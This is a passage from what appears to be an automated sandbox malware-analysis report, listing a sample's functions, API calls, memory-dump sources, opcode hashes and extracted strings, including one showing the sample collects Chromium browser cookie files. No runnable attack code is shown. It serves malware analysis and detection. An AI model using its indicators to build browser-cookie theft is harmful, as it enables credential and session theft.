                                                    • Instruction Fuzzy Hash: F9111871208301AFD704CF15D46475BFBE5EBC5329F108A1DE8A90B691CB79EA09CBC6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004375CD Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00437658
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: cc0bdeeb390416a8005f9aaf9f86a7cb8d3b6ea8d4e88d9dbda576cfd526ac67
                                                    • Instruction ID: 13577f52a53989cb91e50d4060b8e90c8ca223ec1dc92ff7deb6a5357cfe3386
                                                    • Opcode Fuzzy Hash: cc0bdeeb390416a8005f9aaf9f86a7cb8d3b6ea8d4e88d9dbda576cfd526ac67
                                                    • Instruction Fuzzy Hash: F30120715083519FE310CF04D99470FBBA2EBC4328F248A4DE8A82B285D375E9098BD2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00437663 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 004376F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 3f92ac738716f08868f76701e8ff749eb3cca96014290a70e787229030ec67c5
                                                    • Instruction ID: 989bc41486a1e5389026f49c5457ede6526072ad99c7132b309b4d2c0076b5c6
                                                    • Opcode Fuzzy Hash: 3f92ac738716f08868f76701e8ff749eb3cca96014290a70e787229030ec67c5
                                                    • Instruction Fuzzy Hash: 1C01F3712083019FE708CF15D46475BBBE2EBC5328F20895EE9A91B691C779D90ACB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00433C2A Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00433CB4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 568252abd8bdcc9c59ee4889d44cb61b75dc80544815d0b9ec631bb4bbfb7d65
                                                    • Instruction ID: 6d027317d9507f32588684f48b86e6a4e16b8ed02588133254db7ad3e02295f4
                                                    • Opcode Fuzzy Hash: 568252abd8bdcc9c59ee4889d44cb61b75dc80544815d0b9ec631bb4bbfb7d65
                                                    • Instruction Fuzzy Hash: 1C01C8701083409FE314CF10C46471BBBE1EBC9328F208E4DE8A917691C779D949CF8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04265895 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 042658E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4265000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: 9e88890e2173048002f0e28c3b68b907d1edb57f534549ca23f4e6223087bf9c
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: FF112B79A10208FFDB01DF98C985E98BBF5AF08351F058094F9489B362D371EA90DF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 0042C500 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$CloseDataInfoOpenWindow
                                                    • String ID: 7$8$9$:$;
                                                    • API String ID: 2278096442-1017836374
                                                    • Opcode ID: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
                                                    • Instruction ID: ec00451678d786202fcc9b385dd1a0758b5b4489dde3fc94fbb9c3a647e150fa
                                                    • Opcode Fuzzy Hash: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
                                                    • Instruction Fuzzy Hash: 9E51CFB0608790DFC720DF38E18571ABBE0AF15314F54895ED8DA8B642D338E946DB6B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D49A7 Relevance: 5.5, Strings: 4, Instructions: 501COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$IDAT$IEND$IHDR
                                                    • API String ID: 0-3181356877
                                                    • Opcode ID: 4ccdbaa75ae868ee336c7b0459e5c41996805ad7b9ec11b17da927287f3cb160
                                                    • Instruction ID: 35f6f168e380d5723198e44b7ce4f23d105ebb495aa189b3d60e62dbfe430eee
                                                    • Opcode Fuzzy Hash: 4ccdbaa75ae868ee336c7b0459e5c41996805ad7b9ec11b17da927287f3cb160
                                                    • Instruction Fuzzy Hash: 2A1203B1A083859FDB04CF28CCD076A7BE1EF85304F05856DEA958B391D379E909CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$GetProcAddress.$l
                                                    • API String ID: 0-2784972518
                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction ID: 50043b43f82c39887ac0b5b8e13ae82b45f0ba0b1b3149c34c111725c7d45be7
                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction Fuzzy Hash: 1D3149B6900609DFEB14CF99C880BAEBBF5FF48328F15408AD545A7214D7B1FA45CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004052F0 Relevance: 3.4, Strings: 2, Instructions: 851COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    • Opcode ID: 74219af944f1d0cf607542fdc4b406d5d0331be3774f0d6c31aafd409cb9e22a
                                                    • Instruction ID: e90677fc5bc6961723399dbea62cc0af4d041e1e5ad0231ce18586d502c8b4a7
                                                    • Opcode Fuzzy Hash: 74219af944f1d0cf607542fdc4b406d5d0331be3774f0d6c31aafd409cb9e22a
                                                    • Instruction Fuzzy Hash: 5B7245716087409FD714CF18C880B9BBBE2EF98314F58892EE98997391D379D984CF96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D55DB Relevance: 3.3, Strings: 2, Instructions: 809COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$8
                                                    • API String ID: 0-46163386
                                                    • Opcode ID: 1159ab4a8af15f81d356408494dcd2cb53999e129f3fd7c2265e99bb87108bde
                                                    • Instruction ID: dccf1ceac467d7e14d6d3e999f4798dd8e270dcd6246f22535a1b3914fa8a623
                                                    • Opcode Fuzzy Hash: 1159ab4a8af15f81d356408494dcd2cb53999e129f3fd7c2265e99bb87108bde
                                                    • Instruction Fuzzy Hash: 65727BB1608341AFD714CF18C890B9BBBE2BF84354F08896DF9998B391D775E944CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F3BAA Relevance: 3.1, Strings: 2, Instructions: 643COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: +u7$Z8J*
                                                    • API String ID: 0-3577212644
                                                    • Opcode ID: 136a0e178bc15a717095d99fc1853dd9a03ca692159141228eba0c7e471279e9
                                                    • Instruction ID: 72b57564a0f095561b349d3c305fc55fe38e06d1f3dc33698c2d6838475779f2
                                                    • Opcode Fuzzy Hash: 136a0e178bc15a717095d99fc1853dd9a03ca692159141228eba0c7e471279e9
                                                    • Instruction Fuzzy Hash: 30326F70544B828AD725CF34C8A4BE3BBE1AF56309F4449ACD1FB8B682D7797006CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D1267 Relevance: 3.0, Strings: 2, Instructions: 518COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $JC
                                                    • API String ID: 0-571460022
                                                    • Opcode ID: 8237440b2d564ce322f90f5c6f76332585ae6391083ee7ebcefec0e17e6b40ae
                                                    • Instruction ID: d57c009c963e9ff8391cc60365c2e4bd1cd63aa4f6dc29de3dad313ed2f12e58
                                                    • Opcode Fuzzy Hash: 8237440b2d564ce322f90f5c6f76332585ae6391083ee7ebcefec0e17e6b40ae
                                                    • Instruction Fuzzy Hash: A31207B1A08751ABE7288E19C4D0367BBE2AF82310F18C99ED4D6476D2D378F549D782
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04209D57 Relevance: 2.8, Strings: 2, Instructions: 310COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: R-,T$R-,T
                                                    • API String ID: 0-2000385741
                                                    • Opcode ID: cd5dd1e870cf72724b0d866ceb1e3723b186c0745ae19588130c5378219dccae
                                                    • Instruction ID: 7da15add8ed7ccdd99d1734976c8abd692e17011af0e2907687c8766284a5d6b
                                                    • Opcode Fuzzy Hash: cd5dd1e870cf72724b0d866ceb1e3723b186c0745ae19588130c5378219dccae
                                                    • Instruction Fuzzy Hash: BBA1DEB1A143128FD714CF18C49076BB3E2FF88324F198A1CE8969B392D775E855CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00439AF0 Relevance: 2.8, Strings: 2, Instructions: 310COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: R-,T$R-,T
                                                    • API String ID: 0-2000385741
                                                    • Opcode ID: 900eeadd4549f363bc7d3d398da917046e8483a8b84d24d15de9a3ff9edd1ce0
                                                    • Instruction ID: 6b83697ab9183c4f383082baa5586d9202c04d839401bfe1d176d3d13e2e3641
                                                    • Opcode Fuzzy Hash: 900eeadd4549f363bc7d3d398da917046e8483a8b84d24d15de9a3ff9edd1ce0
                                                    • Instruction Fuzzy Hash: B2A1CC71A043128BCB24CF18C49066FB7E1FF88724F199A1DE8959B391D778EC51CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E40B1 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "$Z%_#
                                                    • API String ID: 0-3398817662
                                                    • Opcode ID: ceb84fe9739bdc1f62c3e15358b27742fe77a0e0a6a87763ca9f11eddebe1c37
                                                    • Instruction ID: b5ea07e1130f38623809a54ef6ab724a1ec90e01a6b6c44b72868d1d3c0f37a2
                                                    • Opcode Fuzzy Hash: ceb84fe9739bdc1f62c3e15358b27742fe77a0e0a6a87763ca9f11eddebe1c37
                                                    • Instruction Fuzzy Hash: 5661FFB0101B819BE7258F21D8A9BE7BBE1FF46349F54894CC0EB4B281D7B66149CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00413E4A Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "$Z%_#
                                                    • API String ID: 0-3398817662
                                                    • Opcode ID: ceb84fe9739bdc1f62c3e15358b27742fe77a0e0a6a87763ca9f11eddebe1c37
                                                    • Instruction ID: 76f333f57adbc6c8ebcadfef8fb2acd4b1b22d2439071723875123babc06b249
                                                    • Opcode Fuzzy Hash: ceb84fe9739bdc1f62c3e15358b27742fe77a0e0a6a87763ca9f11eddebe1c37
                                                    • Instruction Fuzzy Hash: 2C61FCB0101B419BE3258F21D8A97E7BBE1FF46349F54890DD1EB4B281DBBA6149CF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E4EB0 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: onqp$F
                                                    • API String ID: 0-3477909023
                                                    • Opcode ID: 5636853cdc4e6313a43929cd248a86b0bcf19cc5822eacfbfe171bbd9458d07b
                                                    • Instruction ID: b3325d17fb701cfff376e4361b155b1f758f3ec655a0949c3be8df8f06d977d2
                                                    • Opcode Fuzzy Hash: 5636853cdc4e6313a43929cd248a86b0bcf19cc5822eacfbfe171bbd9458d07b
                                                    • Instruction Fuzzy Hash: 3D216D786193419BD728CF15C4A077FB7E2AFC6708F54192CE9868B781C7B5A8018B8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F42EB Relevance: 1.9, Strings: 1, Instructions: 676COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: P6D/
                                                    • API String ID: 0-4117495492
                                                    • Opcode ID: a840cc439b2e62fd33296f488684244062af140e18fd85e7f9474e6811fbe092
                                                    • Instruction ID: 36fe20b8b985cbc292f8b28645e6ee61cba6818e39a419d3e32eee38797ce32a
                                                    • Opcode Fuzzy Hash: a840cc439b2e62fd33296f488684244062af140e18fd85e7f9474e6811fbe092
                                                    • Instruction Fuzzy Hash: F2327170544B928AE725CF34C8A4BE3BBE1AF16309F4449ACD1FB8B682D7797006CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F42EE Relevance: 1.9, Strings: 1, Instructions: 650COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: P6D/
                                                    • API String ID: 0-4117495492
                                                    • Opcode ID: c16701a6ed728ec4d9e005f966cae99fdda97c22a307ae63ec63ddceca2a6b7b
                                                    • Instruction ID: 228216d74c4205fd5b1398a6173885e80459c1a57305620065f232a408cc33ce
                                                    • Opcode Fuzzy Hash: c16701a6ed728ec4d9e005f966cae99fdda97c22a307ae63ec63ddceca2a6b7b
                                                    • Instruction Fuzzy Hash: 5B327170544B828AE725CF34C8A4BE3BBE1AF16309F4449ACD1FB8B682D7797046CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041EC7A7 Relevance: 1.6, Strings: 1, Instructions: 365COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: onqp
                                                    • API String ID: 0-1718216680
                                                    • Opcode ID: 484dc11344905c3ebec77af382d47984beb26b877959679f2d85a1e54cd5bce5
                                                    • Instruction ID: 7412a2c39c5278c6f418a6de22957f2e4afcc8c1a77404d28f3cfa04ed5f08f5
                                                    • Opcode Fuzzy Hash: 484dc11344905c3ebec77af382d47984beb26b877959679f2d85a1e54cd5bce5
                                                    • Instruction Fuzzy Hash: 4AA1DEB56086018BDB18DF19C8A1B7BB3E1FF91314F094A5CE88287291F375E915CBD6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041EAB27 Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: onqp
                                                    • API String ID: 0-1718216680
                                                    • Opcode ID: 2051f58950d6556b3dc70e8865951f271fa6186780459c926919e30a701ddc1f
                                                    • Instruction ID: 078dea659b9276b8858f9368a1e4f6ca674428c699c356749a461052591db8bd
                                                    • Opcode Fuzzy Hash: 2051f58950d6556b3dc70e8865951f271fa6186780459c926919e30a701ddc1f
                                                    • Instruction Fuzzy Hash: 10810EB5A046018BDB14DF15C891B7BB3F5EF813A8F098658E8969B381E371F840C7A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A8C0 Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: onqp
                                                    • API String ID: 0-1718216680
                                                    • Opcode ID: eb3e40eabffb3cc27e3f25834592185739f65d8703e3bee9c4c930af95d44ac3
                                                    • Instruction ID: 9a6a00b11931bfd5125c6228de1fad642e1a8a21050320c2279e65f0c98fc608
                                                    • Opcode Fuzzy Hash: eb3e40eabffb3cc27e3f25834592185739f65d8703e3bee9c4c930af95d44ac3
                                                    • Instruction Fuzzy Hash: BF8135B19052018BD710DF14C852BBBB3B5EF81368F19451EE89657381E378EDA1C7AB
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041EA687 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 'QRS
                                                    • API String ID: 0-187708292
                                                    • Opcode ID: ee4f23d677ea0c1aa34874a7e52b4231360893fc24e1726cc3047dceb4e36e8d
                                                    • Instruction ID: a7ef52de098b3edeb4424217eae9ac49b2c4e755e633bce4c8b110814b529c30
                                                    • Opcode Fuzzy Hash: ee4f23d677ea0c1aa34874a7e52b4231360893fc24e1726cc3047dceb4e36e8d
                                                    • Instruction Fuzzy Hash: CE7115B9A046108BDB14DF15C892B7773F1EF953A4F09859CE8924B3D0E735E902C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A420 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 'QRS
                                                    • API String ID: 0-187708292
                                                    • Opcode ID: d1ce247b26355ecb7dde2092838e56748487b5dfb5d60553314fd4a6fbcef6d9
                                                    • Instruction ID: 32227454a23ff9270a383fc47471354c59474b61149620c9ac9ef1c92598dfac
                                                    • Opcode Fuzzy Hash: d1ce247b26355ecb7dde2092838e56748487b5dfb5d60553314fd4a6fbcef6d9
                                                    • Instruction Fuzzy Hash: 977112B15052108BCB14DF14C852AB7B3F1EFA5324F19811DE8924B391E378DD91C7A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004065F0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,
                                                    • API String ID: 0-3772416878
                                                    • Opcode ID: 3396d62e2048fa093097fda78be89d79a03400b317c59f17132475d5f544bc36
                                                    • Instruction ID: c6cf47c53411e6d83904256831e1a1016e7efc88929b593bc1aad792f5064332
                                                    • Opcode Fuzzy Hash: 3396d62e2048fa093097fda78be89d79a03400b317c59f17132475d5f544bc36
                                                    • Instruction Fuzzy Hash: 1CB11871509381AFD314CF58C88475BFBE0AFA9304F444A6EF49997382C775DA28CBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E3EAD Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • [info] collected cookies file of the chromium-based browser, xrefs: 041E3F7D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [info] collected cookies file of the chromium-based browser
                                                    • API String ID: 0-3235166063
                                                    • Opcode ID: fe1f27bd79c86945ddee36ea89530b1ee207199345b48d43739a08dc803a1af2
                                                    • Instruction ID: ceb2dfe892cd11483e40e5ca2a40699b79d32ef21d130b7c58c6d0d19d62266d
                                                    • Opcode Fuzzy Hash: fe1f27bd79c86945ddee36ea89530b1ee207199345b48d43739a08dc803a1af2
                                                    • Instruction Fuzzy Hash: 27412870215B80CAE329CB34C8A4BEBB7B2BB45309F845A6CD4EB8B281D7757506CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00413C46 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • [info] collected cookies file of the chromium-based browser, xrefs: 00413D16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [info] collected cookies file of the chromium-based browser
                                                    • API String ID: 0-3235166063
                                                    • Opcode ID: fe1f27bd79c86945ddee36ea89530b1ee207199345b48d43739a08dc803a1af2
                                                    • Instruction ID: a5db71ad896cb5a85abb4fe5762872ae52644060d2c271ddd36e9c91ed33445c
                                                    • Opcode Fuzzy Hash: fe1f27bd79c86945ddee36ea89530b1ee207199345b48d43739a08dc803a1af2
                                                    • Instruction Fuzzy Hash: FF412A70115B40CBE329CB34C895BEBB7B2BB45305F445A2DD0EB572C2DBB875468B54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041EF49B Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
